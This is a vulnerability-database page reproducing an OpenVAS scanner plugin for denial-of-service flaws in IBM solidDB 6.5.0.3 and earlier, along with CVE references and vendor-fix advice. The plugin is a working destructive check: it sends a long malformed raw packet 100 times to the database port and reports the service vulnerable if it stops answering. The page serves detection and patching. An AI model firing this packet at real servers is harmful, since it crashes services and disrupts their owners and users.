IBM solidDB Packets Processing Denial of Service Vulnerabilities
🗓️ 11 Apr 2011 00:00:00Reported by Copyright (C) 2011 Greenbone AGType
openvas🔗 plugins.openvas.org👁 32 Views
| Reporter | Title | Published | Views | Family All 19 |
|---|---|---|---|---|
| IBM Solid Database 6.5 < 6.5.0.8 Multiple Denial of Service Vulnerabilities | 23 Feb 201200:00 | – | nessus | |
| IBM solidDB 6.5 < 6.5.0.8 Multiple Denial of Service Vulnerabilities | 23 Feb 201200:00 | – | nessus | |
| CVE-2010-4055 | 22 Oct 201022:00 | – | cve | |
| CVE-2010-4056 | 22 Oct 201022:00 | – | cve | |
| CVE-2010-4057 | 22 Oct 201022:00 | – | cve | |
| CVE-2010-4055 | 22 Oct 201022:00 | – | cvelist | |
| CVE-2010-4056 | 22 Oct 201022:00 | – | cvelist | |
| CVE-2010-4057 | 22 Oct 201022:00 | – | cvelist | |
| IBM solidDB 6.5.0.3 - Denial of Service | 15 Oct 201000:00 | – | exploitdb | |
| EUVD-2010-4032 | 7 Oct 202500:30 | – | euvd |
10
| Source | Link |
|---|---|
| xforce | www.xforce.iss.net/xforce/xfdb/62590 |
| exploit-db | www.exploit-db.com/exploits/15261 |
| www-01 | www.www-01.ibm.com/support/docview.wss |
| aluigi | www.aluigi.altervista.org/adv/soliddb_1-adv.txt |
| securitytracker | www.securitytracker.com/id |
| vupen | www.vupen.com/english/advisories/2010/2715 |
# SPDX-FileCopyrightText: 2011 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only
CPE = "cpe:/a:ibm:soliddb";
if(description)
{
script_oid("1.3.6.1.4.1.25623.1.0.801531");
script_version("2023-07-21T05:05:22+0000");
script_tag(name:"last_modification", value:"2023-07-21 05:05:22 +0000 (Fri, 21 Jul 2023)");
script_tag(name:"creation_date", value:"2011-04-11 14:40:00 +0200 (Mon, 11 Apr 2011)");
script_cve_id("CVE-2010-4055", "CVE-2010-4056", "CVE-2010-4057");
script_tag(name:"cvss_base", value:"5.0");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:N/I:N/A:P");
script_name("IBM solidDB Packets Processing Denial of Service Vulnerabilities");
script_xref(name:"URL", value:"http://securitytracker.com/id?1024597");
script_xref(name:"URL", value:"http://xforce.iss.net/xforce/xfdb/62590");
script_xref(name:"URL", value:"http://www.exploit-db.com/exploits/15261");
script_xref(name:"URL", value:"http://www.vupen.com/english/advisories/2010/2715");
script_xref(name:"URL", value:"http://aluigi.altervista.org/adv/soliddb_1-adv.txt");
script_tag(name:"qod_type", value:"remote_analysis");
script_category(ACT_DENIAL);
script_copyright("Copyright (C) 2011 Greenbone AG");
script_family("Denial of Service");
script_dependencies("gb_ibm_soliddb_detect.nasl");
script_mandatory_keys("IBM-soliddb/installed");
script_tag(name:"impact", value:"Successful exploitation will let the remote unauthenticated
attackers to crash an affected process or consume CPU resources, creating a
denial of service condition.");
script_tag(name:"affected", value:"IBM solidDB version 6.5.0.3 and prior.");
script_tag(name:"insight", value:"Multiple flaws caused by input validation, stack exhaustion and
NULL pointer dereference errors in 'solid.exe' when processing malformed packets
sent to port 1315/TCP.");
script_tag(name:"solution", value:"Apply the relevant updates from the referenced advisory.");
script_tag(name:"solution_type", value:"VendorFix");
script_xref(name:"URL", value:"http://www-01.ibm.com/support/docview.wss?uid=swg27021052");
script_tag(name:"summary", value:"IBM solidDB is prone to multiple Denial of Service vulnerabilities.");
exit(0);
}
include("host_details.inc");
if(!port = get_app_port(cpe:CPE))
exit(0);
if(!get_app_location(cpe:CPE, port:port, nofork:TRUE))
exit(0);
soc = open_sock_tcp(port);
if(!soc)
exit(0);
for(i = 0; i < 100; i++) {
raw_packet = raw_string(0x02, 0x00, 0x00, 0x00, 0x00, 0x11, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0xfc, 0x3a, 0x00, 0x00, 0xfc,
0x3a, 0x00, 0x00, 0xfc, 0x3a, 0x00, 0x00, 0xfc,
0x3a, 0x00, 0x00, 0xfc, 0x3a, 0x00, 0x00, 0xfc,
0x3a, 0x00, 0x00, 0xfc, 0x3a, 0x00, 0x00, 0xfc,
0x3a, 0x00, 0x00, 0xfc, 0x3a, 0x00, 0x00, 0xfc,
0x3a, 0x00, 0x00, 0xfc, 0x3a, 0x00, 0x00, 0xfc,
0x3a, 0x00, 0x00, 0xfc, 0x3a, 0x00, 0x00, 0xfc,
0x3a, 0x00, 0x00, 0xfc, 0x3a, 0x00, 0x00, 0xfc,
0x3a, 0x00, 0x00, 0xfc, 0x3a, 0x00, 0x00, 0xfc,
0x3a, 0x00, 0x00, 0xfc, 0x3a, 0x00, 0x00, 0xfc,
0x3a, 0x00, 0x00, 0xfc, 0x3a, 0x00, 0x00, 0xfc,
0x3a, 0x00, 0x00, 0xfc, 0x3a, 0x00, 0x00, 0xfc,
0x3a, 0x00, 0x00, 0xfc, 0x3a, 0x00, 0x00, 0xfc,
0x3a, 0x00, 0x00, 0xfc, 0x3a, 0x00, 0x00, 0xfc,
0x3a, 0x00, 0x00, 0xfc, 0x3a, 0x00, 0x00, 0xfc,
0x3a, 0x00, 0x00, 0xfc, 0x3a, 0x00, 0x00, 0xfc,
0x3a, 0x00, 0x00, 0xfc, 0x3a, 0x00, 0x00, 0xfc,
0x3a, 0x00, 0x00, 0xfc, 0x3a, 0x00, 0x00, 0xfc,
0x3a, 0x00, 0x00, 0xfc, 0x3a, 0x00, 0x00, 0xfc,
0x3a, 0x00, 0x00, 0xfc, 0x3a, 0x00, 0x00, 0xfc,
0x3a, 0x00, 0x00, 0xfc, 0x3a, 0x00, 0x00, 0xfc,
0x3a, 0x00, 0x00, 0xfc, 0x3a, 0x00, 0x00, 0xfc,
0x3a, 0x00, 0x00, 0xfc, 0x3a, 0x00, 0x00, 0xfc,
0x3a, 0x00, 0x00, 0xfc, 0x3a, 0x00, 0x00, 0xfc,
0x3a, 0x00, 0x00, 0xfc, 0x3a, 0x00, 0x00, 0xfc,
0x3a, 0x00, 0x00, 0xfc, 0x3a, 0x00, 0x00, 0xfc,
0x3a, 0x00, 0x00, 0xfc, 0x3a, 0x00, 0x00, 0xfc,
0x3a, 0x00, 0x00, 0xfc, 0x3a, 0x00, 0x00, 0xfc,
0x3a, 0x00, 0x00, 0xfc, 0x3a, 0x00, 0x00, 0xfc,
0x3a, 0x00, 0x00, 0xfc, 0x3a, 0x00, 0x00, 0xfc,
0x3a, 0x00, 0x00, 0xfc, 0x3a, 0x00, 0x00, 0xfc,
0x3a, 0x00, 0x00, 0xfc, 0x3a, 0x00, 0x00, 0xfc,
0x3a, 0x00, 0x00, 0xfc, 0x3a, 0x00, 0x00, 0xfc,
0x3a, 0x00, 0x00, 0xfc, 0x3a, 0x00, 0x00, 0xfc,
0x3a, 0x00, 0x00, 0xfc, 0x3a, 0x00, 0x00, 0xfc,
0x3a, 0x00, 0x00, 0xfc, 0x3a, 0x00, 0x00, 0xfc,
0x3a, 0x00, 0x00, 0xfc, 0x3a, 0x00, 0x00, 0xfc,
0x3a, 0x00, 0x00, 0xfc, 0x3a, 0x00, 0x00, 0xfc,
0x3a, 0x00, 0x00, 0xfc, 0x3a, 0x00, 0x00, 0xfc,
0x3a, 0x00, 0x00, 0xfc, 0x3a, 0x00, 0x00, 0xfc,
0x3a, 0x00, 0x00, 0xfc, 0x3a, 0x00, 0x00, 0xfc,
0x3a, 0x00, 0x00, 0xfc, 0x3a, 0x00, 0x00, 0xfc,
0x3a, 0x00, 0x00, 0xfc, 0x3a, 0x00, 0x00, 0xfc,
0x3a, 0x00, 0x00, 0xfc, 0x3a, 0x00, 0x00, 0xfc,
0x3a, 0x00, 0x00, 0xfc, 0x3a, 0x00, 0x00, 0xfc,
0x3a, 0x00, 0x00, 0xfc, 0x3a, 0x00, 0x00, 0xfc,
0x3a, 0x00, 0x00, 0xfc, 0x3a, 0x00, 0x00, 0xfc,
0x3a, 0x00, 0x00, 0xfc, 0x3a, 0x00, 0x00, 0xfc,
0x3a, 0x00, 0x00, 0xfc, 0x3a, 0x00, 0x00, 0xfc,
0x3a, 0x00, 0x00, 0xfc, 0x3a, 0x00, 0x00, 0xfc,
0x3a, 0x00, 0x00, 0xfc, 0x3a, 0x00, 0x00, 0xfc,
0x3a, 0x00, 0x00, 0xfc, 0x3a, 0x00, 0x00, 0xfc,
0x3a, 0x00, 0x00, 0xfc, 0x3a, 0x00, 0x00, 0xfc,
0x3a, 0x00, 0x00, 0xfc, 0x3a, 0x00, 0x00, 0xfc,
0x3a, 0x00, 0x00, 0xfc, 0x3a, 0x00, 0x00, 0xfc,
0x3a, 0x00, 0x00, 0xfc, 0x3a, 0x00, 0x00, 0xfc,
0x3a, 0x00, 0x00, 0xfc, 0x3a, 0x00, 0x00, 0xfc,
0x3a, 0x00, 0x00, 0xfc, 0x3a, 0x00, 0x00, 0xfc,
0x3a, 0x00, 0x00, 0xfc, 0x3a, 0x00, 0x00, 0xfc,
0x3a, 0x00, 0x00, 0xfc, 0x3a, 0x00, 0x00, 0xfc,
0x3a, 0x00, 0x00, 0xfc, 0x3a, 0x00, 0x00, 0xfc,
0x3a, 0x00, 0x00, 0xfc, 0x3a, 0x00, 0x00, 0xfc,
0x3a, 0x00, 0x00, 0xfc, 0x3a, 0x00, 0x00, 0xfc,
0x3a, 0x00, 0x00, 0xfc, 0x3a, 0x00, 0x00, 0xfc,
0x3a, 0x00, 0x00, 0xfc, 0x3a, 0x00, 0x00, 0xfc,
0x3a, 0x00, 0x00, 0xfc, 0x3a, 0x00, 0x00, 0xfc,
0x3a, 0x00, 0x00, 0xfc, 0x3a, 0x00, 0x00, 0xfc,
0x3a, 0x00, 0x00, 0xfc, 0x3a, 0x00, 0x00, 0xfc,
0x3a, 0x00, 0x00, 0xfc, 0x3a, 0x00, 0x00, 0xfc,
0x3a, 0x00, 0x00, 0xfc, 0x3a, 0x00, 0x00, 0xfc,
0x3a, 0x00, 0x00, 0xfc, 0x3a, 0x00, 0x00, 0xfc,
0x3a, 0x00, 0x00, 0xfc, 0x3a, 0x00, 0x00, 0xfc,
0x3a, 0x00, 0x00, 0xfc, 0x3a, 0x00, 0x00, 0xfc,
0x3a, 0x00, 0x00, 0xfc, 0x3a, 0x00, 0x00, 0xfc,
0x3a, 0x00, 0x00, 0xfc, 0x3a, 0x00, 0x00, 0xfc,
0x3a, 0x00, 0x00, 0xfc, 0x3a, 0x00, 0x00, 0xfc,
0x3a, 0x00, 0x00, 0xfc, 0x3a, 0x00, 0x00, 0xfc,
0x3a, 0x00, 0x00, 0xfc, 0x3a, 0x00, 0x00, 0xfc,
0x3a, 0x00, 0x00, 0xfc, 0x3a, 0x00, 0x00, 0xfc,
0x3a, 0x00, 0x00, 0xfc, 0x3a, 0x00, 0x00, 0xfc,
0x3a, 0x00, 0x00, 0xfc, 0x3a, 0x00, 0x00, 0xfc,
0x3a, 0x00, 0x00, 0xfc, 0x3a, 0x00, 0x00, 0xfc,
0x3a, 0x00, 0x00, 0xfc, 0x3a, 0x00, 0x00, 0xfc,
0x3a, 0x00, 0x00, 0xfc, 0x3a, 0x00, 0x00, 0xfc,
0x3a, 0x00, 0x00, 0xfc, 0x3a, 0x00, 0x00, 0xfc,
0x3a, 0x00, 0x00, 0xfc, 0x3a, 0x00, 0x00, 0xfc,
0x3a, 0x00, 0x00, 0xfc, 0x3a, 0x00, 0x00, 0xfc,
0x3a, 0x00, 0x00, 0xfc, 0x3a, 0x00, 0x00, 0xfc,
0x3a, 0x00, 0x00, 0xfc, 0x3a, 0x00, 0x00, 0xfc,
0x3a, 0x00, 0x00, 0xfc, 0x3a, 0x00, 0x00, 0xfc,
0x3a, 0x00, 0x00, 0xfc, 0x3a, 0x00, 0x00, 0xfc,
0x3a, 0x00, 0x00, 0xfc, 0x3a, 0x00, 0x00, 0xfc,
0x3a, 0x00, 0x00, 0xfc, 0x3a, 0x00, 0x00, 0xfc,
0x3a, 0x00, 0x00, 0xfc, 0x3a, 0x00, 0x00, 0xfc,
0x3a, 0x00, 0x00, 0xfc, 0x3a, 0x00, 0x00, 0xfc,
0x3a, 0x00, 0x00, 0xfc, 0x3a, 0x00, 0x00, 0xfc,
0x3a, 0x00, 0x00, 0xfc, 0x3a, 0x00, 0x00, 0xfc,
0x3a, 0x00, 0x00, 0xfc, 0x3a, 0x00, 0x00, 0xfc,
0x3a, 0x00, 0x00, 0xfc, 0x3a, 0x00, 0x00, 0xfc,
0x3a, 0x00, 0x00, 0xfc, 0x3a, 0x00, 0x00, 0xfc,
0x3a, 0x00, 0x00, 0xfc, 0x3a, 0x00, 0x00, 0xfc,
0x3a, 0x00, 0x00, 0xfc, 0x3a, 0x00, 0x00, 0xfc,
0x3a, 0x00, 0x00, 0xfc, 0x3a, 0x00, 0x00, 0xfc,
0x3a, 0x00, 0x00, 0xfc, 0x3a, 0x00, 0x00, 0xfc,
0x3a, 0x00, 0x00, 0xfc, 0x3a, 0x00, 0x00, 0xfc,
0x3a, 0x00, 0x00, 0xfc, 0x3a, 0x00, 0x00, 0xfc,
0x3a, 0x00, 0x00, 0xfc, 0x3a, 0x00, 0x00, 0xfc,
0x3a, 0x00, 0x00, 0xfc, 0x3a, 0x00, 0x00, 0xfc,
0x3a, 0x00, 0x00, 0xfc, 0x3a, 0x00, 0x00, 0xfc,
0x3a, 0x00, 0x00, 0xfc, 0x3a, 0x00, 0x00, 0xfc,
0x3a, 0x00, 0x00, 0xfc, 0x3a, 0x00, 0x00, 0xfc,
0x3a, 0x00, 0x00, 0xfc, 0x3a, 0x00, 0x00, 0xfc,
0x3a, 0x00, 0x00, 0xfc, 0x3a, 0x00, 0x00, 0xfc,
0x3a, 0x00, 0x00, 0xfc, 0x3a, 0x00, 0x00, 0xfc,
0x3a, 0x00, 0x00, 0xfc, 0x3a, 0x00, 0x00, 0xfc,
0x3a, 0x00, 0x00, 0xfc, 0x3a, 0x00, 0x00, 0xfc,
0x3a, 0x00, 0x00, 0xfc, 0x3a, 0x00, 0x00, 0xfc,
0x3a, 0x00, 0x00, 0xfc, 0x3a, 0x00, 0x00, 0xfc,
0x3a, 0x00, 0x00, 0xfc, 0x3a, 0x00, 0x00, 0xfc,
0x3a, 0x00, 0x00, 0xfc, 0x3a, 0x00, 0x00, 0xfc,
0x3a, 0x00, 0x00, 0xfc, 0x3a, 0x00, 0x00, 0xfc,
0x3a, 0x00, 0x00, 0xfc, 0x3a, 0x00, 0x00, 0xfc,
0x3a, 0x00, 0x00, 0xfc, 0x3a, 0x00, 0x00, 0xfc,
0x3a, 0x00, 0x00, 0xfc, 0x3a, 0x00, 0x00, 0xfc,
0x3a, 0x00, 0x00, 0xfc, 0x3a, 0x00, 0x00, 0xfc);
send(socket:soc, data:raw_packet);
}
close(soc);
sleep(5);
soc = open_sock_tcp(port);
if(!soc) {
security_message(port:port);
exit(0);
}
exit(99);
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
21 Jul 2023 00:00Current
6.3Medium risk
Vulners AI Score6.3
CVSS 25
EPSS0.0843